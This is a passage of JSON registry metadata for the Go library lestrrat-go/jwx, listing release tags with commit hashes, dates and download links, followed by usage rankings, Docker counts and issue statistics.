v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.119Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.504739678221035,"dependent_packages_count":6.096807687315833,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":6.300773682768433},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v3","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v3","docker_dependents_count":2,"docker_downloads_count":606102918,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v3","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v3/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv3/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org